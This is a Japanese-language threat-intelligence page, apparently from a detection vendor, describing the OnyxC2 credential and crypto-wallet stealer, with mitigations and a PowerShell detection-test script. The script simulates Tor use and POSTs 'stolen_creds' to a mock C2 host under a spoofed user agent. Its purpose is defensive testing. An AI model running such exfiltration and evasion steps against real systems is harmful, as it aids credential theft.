SOC Prime Bias:

16 Jun 2026 12:54 UTC

オンキシーC2:210アプリケーションを狙う新たなスティーラー

Author Photo
SOC Prime Team linkedin icon フォローする
オンキシーC2:210アプリケーションを狙う新たなスティーラー
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

OnyxC2は、約210種類のアプリケーションをターゲットにした資格情報、二要素認証拡張、および暗号通貨ウォレットを狙うマルウェア・アズ・ア・サービスステーラーです。このプラットフォームは、管理パネル、ビルダー、リモートアクセス機能を含む商業スタイルのツールキットを提供しています。また、大きめの署名済みバイナリを用いたDLLサイドローディングや暗号化ペイロードコンポーネントなど、高度な回避手法に依存しています。

調査

BlackFogの研究者は複数のOnyxC2サンプルを調査し、120 MB以上のNVIDIAグラフィックスライブラリに偽装した悪意のあるDLLを伴う署名済みホスト実行ファイルを悪用するDLLサイドローディング手法を発見しました。ネットワーク解析では、特定のバックエンドAPIエンドポイントとHTTPSで通信しているマルウェアが確認されました。研究者はまた、単純な静的解析を回避するためにDLL内に埋め込まれた暗号化されたオーバーレイも発見しました。

緩和策

エンドポイントでのデータの流出防止コントロールを展開することで、使用されるプロセスにかかわらず不正な外向きトラフィックをブロックすることができます。セキュリティチームは署名済みバイナリと関連付けられた疑わしいDLLロードを監視し、ユーザ書き込み可能なパスに現れる異常に大きなファイルを調査すべきです。強力なアプリケーション制御ポリシーと不正なスケジュールタスクの監視も推奨されます。

対応策

OnyxC2アクティビティが検出された場合、さらなるデータ窃盗を防ぐために直ちに影響を受けるシステムを隔離します。復号化ペイロードを回復するためにフルメモリーダンプをキャプチャし、アクティブなHVNCセッションまたはSOCKS5プロキシアクティビティを確認します。最近作成されたすべてのスケジュールタスクを見直し、ブラウザ資格情報ストアを検査して侵害の証拠を探します。

攻撃フロー

シミュレーション実行

必須条件: テレメトリ & ベースラインの事前飛行チェックの通過。

理由: このセクションは、検出ルールを引き起こすために設計された敵対技術(TTP)の正確な実行を詳述します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としなければなりません。抽象的または無関係な例は誤診を引き起こします。

  • 攻撃の概要とコマンド: 敵は盗まれたブラウザ資格情報を流出させようとしています。ネットワークセキュリティ監視による検出を避けるため、彼らはポータブルTorバイナリを使用して匿名化トンネルを作成します。一度トンネルが確立されると、マルウェアはそのコマンド&コントロール(C2)サーバーへの接続を開始します。正規のWebトラフィックに混じるため、マルウェアは自らのユーザーエージェントを「Cloudflare」と偽装し、Cloudflare プロキシの背後にホストされている特定のAPIエンドポイントをターゲットにします。この一連の流れは、検出ルールのコリレーションを引き起こすように設計されています。 tor コマンドライン引数と特定の /backend/api/app.php URLパターン。

  • リグレッションテストスクリプト:

    # OnyxC2 ステーラー通信のシミュレーション
    
    # 1. Torの存在のシミュレーション(ダミーファイル/プロセスの動作を作成)
    # 実際のシナリオでは、これが実際のtor.exeになります
    $TorPath = "$env:TEMPtor.exe"
    "シミュレートされたTorバイナリコンテンツ" | Out-File -FilePath $TorPath
    
    # コマンドラインで'tor'によるプロセス実行イベントを作成
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo トサービスを実行中" -WindowStyle Hidden
    
    # 検出ロジック 'command_line|contains: tor' が当たるように、
    # 文字列'tor'を含むコマンドを実行します
    cmd.exe /c "echo torプロキシの初期化..."
    
    # 2. C2ネットワーク接続のシミュレーション
    # PowerShellを使用して特定のURLとユーザーエージェントでのネットワーク接続をシミュレートします
    $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php"
    $UserAgent = "Cloudflare-Proxy-Agent/1.0"
    
    Write-Host "C2通信を$C2Urlに試みています"
    Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue
  • クリーンアップコマンド:

    # シミュレートされたアーティファクトを削除
    Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "シミュレーションのクリーンアップ完了。"